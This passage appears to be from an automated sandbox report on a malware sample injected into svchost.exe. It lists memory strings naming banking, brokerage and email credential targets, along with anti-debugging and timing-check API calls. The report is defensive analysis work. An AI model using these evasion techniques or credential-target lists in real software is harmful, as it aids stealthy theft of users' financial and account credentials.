                Source: 1f2Wt16K.10.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 1f2Wt16K.10.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 1f2Wt16K.10.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 1f2Wt16K.10.dr | Binary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 1f2Wt16K.10.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 1f2Wt16K.10.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 1f2Wt16K.10.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 1f2Wt16K.10.dr | Binary or memory string: outlook.office.comVMware20,11696487552s
                Source: 1f2Wt16K.10.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 1f2Wt16K.10.dr | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 1f2Wt16K.10.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 1f2Wt16K.10.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 1f2Wt16K.10.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | API call chain: ExitProcess graph end node graph_0-104976
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | API call chain: ExitProcess graph end node graph_0-105475
                Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\takeown.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0317096E rdtsc 2_2_0317096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004172E3 LdrLoadDll, 2_2_004172E3
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_01003F09 BlockInput, 0_2_01003F09
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_00F93B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00F93B3A
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_00FC5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00FC5A7C
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_00F94B37 LoadLibraryA,GetProcAddress, 0_2_00F94B37
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_01153540 mov eax, dword ptr fs:[00000030h] 0_2_01153540
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_011534E0 mov eax, dword ptr fs:[00000030h] 0_2_011534E0
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_01151E70 mov eax, dword ptr fs:[00000030h] 0_2_01151E70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0312C310 mov ecx, dword ptr fs:[00000030h] 2_2_0312C310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03150310 mov ecx, dword ptr fs:[00000030h] 2_2_03150310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0316A30B mov eax, dword ptr fs:[00000030h] 2_2_0316A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0316A30B mov eax, dword ptr fs:[00000030h] 2_2_0316A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0316A30B mov eax, dword ptr fs:[00000030h] 2_2_0316A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B035C mov eax, dword ptr fs:[00000030h] 2_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B035C mov eax, dword ptr fs:[00000030h] 2_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B035C mov eax, dword ptr fs:[00000030h] 2_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B035C mov ecx, dword ptr fs:[00000030h] 2_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B035C mov eax, dword ptr fs:[00000030h] 2_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B035C mov eax, dword ptr fs:[00000030h] 2_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031FA352 mov eax, dword ptr fs:[00000030h] 2_2_031FA352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h] 2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h] 2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h] 2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h] 2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h] 2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h] 2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h] 2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h] 2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h] 2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h] 2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h] 2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h] 2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h] 2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h] 2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h] 2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031D437C mov eax, dword ptr fs:[00000030h] 2_2_031D437C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03128397 mov eax, dword ptr fs:[00000030h] 2_2_03128397
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03128397 mov eax, dword ptr fs:[00000030h] 2_2_03128397
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03128397 mov eax, dword ptr fs:[00000030h] 2_2_03128397
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0312E388 mov eax, dword ptr fs:[00000030h] 2_2_0312E388
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0312E388 mov eax, dword ptr fs:[00000030h] 2_2_0312E388
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0312E388 mov eax, dword ptr fs:[00000030h] 2_2_0312E388
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0315438F mov eax, dword ptr fs:[00000030h] 2_2_0315438F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0315438F mov eax, dword ptr fs:[00000030h] 2_2_0315438F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031DE3DB mov eax, dword ptr fs:[00000030h] 2_2_031DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031DE3DB mov eax, dword ptr fs:[00000030h] 2_2_031DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_031DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031DE3DB mov eax, dword ptr fs:[00000030h] 2_2_031DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031D43D4 mov eax, dword ptr fs:[00000030h] 2_2_031D43D4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031D43D4 mov eax, dword ptr fs:[00000030h] 2_2_031D43D4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031EC3CD mov eax, dword ptr fs:[00000030h] 2_2_031EC3CD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h] 2_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h] 2_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h] 2_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h] 2_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B63C0 mov eax, dword ptr fs:[00000030h] 2_2_031B63C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0314E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0314E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0314E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0314E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0314E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0314E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031663FF mov eax, dword ptr fs:[00000030h] 2_2_031663FF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h] 2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h] 2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h] 2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h] 2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h] 2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h] 2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h] 2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h] 2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0312823B mov eax, dword ptr fs:[00000030h] 2_2_0312823B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0312A250 mov eax, dword ptr fs:[00000030h] 2_2_0312A250
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03136259 mov eax, dword ptr fs:[00000030h] 2_2_03136259
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B8243 mov eax, dword ptr fs:[00000030h] 2_2_031B8243
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031B8243 mov ecx, dword ptr fs:[00000030h] 2_2_031B8243
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h] 2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h] 2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h] 2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h] 2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h] 2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h] 2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h] 2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134260 mov eax, dword ptr fs:[00000030h]2_2_03134260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134260 mov eax, dword ptr fs:[00000030h]2_2_03134260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134260 mov eax, dword ptr fs:[00000030h]2_2_03134260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312826B mov eax, dword ptr fs:[00000030h]2_2_0312826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E284 mov eax, dword ptr fs:[00000030h]2_2_0316E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E284 mov eax, dword ptr fs:[00000030h]2_2_0316E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B0283 mov eax, dword ptr fs:[00000030h]2_2_031B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B0283 mov eax, dword ptr fs:[00000030h]2_2_031B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B0283 mov eax, dword ptr fs:[00000030h]2_2_031B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402A0 mov eax, dword ptr fs:[00000030h]2_2_031402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402A0 mov eax, dword ptr fs:[00000030h]2_2_031402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov ecx, dword ptr fs:[00000030h]2_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402E1 mov eax, dword ptr fs:[00000030h]2_2_031402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402E1 mov eax, dword ptr fs:[00000030h]2_2_031402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402E1 mov eax, dword ptr fs:[00000030h]2_2_031402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DA118 mov ecx, dword ptr fs:[00000030h]2_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DA118 mov eax, dword ptr fs:[00000030h]2_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DA118 mov eax, dword ptr fs:[00000030h]2_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DA118 mov eax, dword ptr fs:[00000030h]2_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F0115 mov eax, dword ptr fs:[00000030h]2_2_031F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov ecx, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov ecx, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov ecx, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov ecx, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03160124 mov eax, dword ptr fs:[00000030h]2_2_03160124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312C156 mov eax, dword ptr fs:[00000030h]2_2_0312C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C8158 mov eax, dword ptr fs:[00000030h]2_2_031C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136154 mov eax, dword ptr fs:[00000030h]2_2_03136154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136154 mov eax, dword ptr fs:[00000030h]2_2_03136154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]2_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]2_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov ecx, dword ptr fs:[00000030h]2_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]2_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]2_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]2_2_031B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]2_2_031B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]2_2_031B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]2_2_031B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A197 mov eax, dword ptr fs:[00000030h]2_2_0312A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A197 mov eax, dword ptr fs:[00000030h]2_2_0312A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A197 mov eax, dword ptr fs:[00000030h]2_2_0312A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03170185 mov eax, dword ptr fs:[00000030h]2_2_03170185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EC188 mov eax, dword ptr fs:[00000030h]2_2_031EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EC188 mov eax, dword ptr fs:[00000030h]2_2_031EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D4180 mov eax, dword ptr fs:[00000030h]2_2_031D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D4180 mov eax, dword ptr fs:[00000030h]2_2_031D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032061E5 mov eax, dword ptr fs:[00000030h]2_2_032061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]2_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]2_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]2_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]2_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F61C3 mov eax, dword ptr fs:[00000030h]2_2_031F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F61C3 mov eax, dword ptr fs:[00000030h]2_2_031F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031601F8 mov eax, dword ptr fs:[00000030h]2_2_031601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]2_2_0314E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]2_2_0314E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]2_2_0314E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]2_2_0314E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B4000 mov ecx, dword ptr fs:[00000030h]2_2_031B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C6030 mov eax, dword ptr fs:[00000030h]2_2_031C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A020 mov eax, dword ptr fs:[00000030h]2_2_0312A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312C020 mov eax, dword ptr fs:[00000030h]2_2_0312C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03132050 mov eax, dword ptr fs:[00000030h]2_2_03132050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B6050 mov eax, dword ptr fs:[00000030h]2_2_031B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315C073 mov eax, dword ptr fs:[00000030h]2_2_0315C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313208A mov eax, dword ptr fs:[00000030h]2_2_0313208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F60B8 mov eax, dword ptr fs:[00000030h]2_2_031F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F60B8 mov ecx, dword ptr fs:[00000030h]2_2_031F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C80A8 mov eax, dword ptr fs:[00000030h]2_2_031C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B20DE mov eax, dword ptr fs:[00000030h]2_2_031B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312C0F0 mov eax, dword ptr fs:[00000030h]2_2_0312C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031720F0 mov ecx, dword ptr fs:[00000030h]2_2_031720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0312A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031380E9 mov eax, dword ptr fs:[00000030h]2_2_031380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B60E0 mov eax, dword ptr fs:[00000030h]2_2_031B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03130710 mov eax, dword ptr fs:[00000030h]2_2_03130710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03160710 mov eax, dword ptr fs:[00000030h]2_2_03160710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316C700 mov eax, dword ptr fs:[00000030h]2_2_0316C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316273C mov eax, dword ptr fs:[00000030h]2_2_0316273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316273C mov ecx, dword ptr fs:[00000030h]2_2_0316273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316273C mov eax, dword ptr fs:[00000030h]2_2_0316273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AC730 mov eax, dword ptr fs:[00000030h]2_2_031AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316C720 mov eax, dword ptr fs:[00000030h]2_2_0316C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316C720 mov eax, dword ptr fs:[00000030h]2_2_0316C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03130750 mov eax, dword ptr fs:[00000030h]2_2_03130750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BE75D mov eax, dword ptr fs:[00000030h]2_2_031BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172750 mov eax, dword ptr fs:[00000030h]2_2_03172750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172750 mov eax, dword ptr fs:[00000030h]2_2_03172750
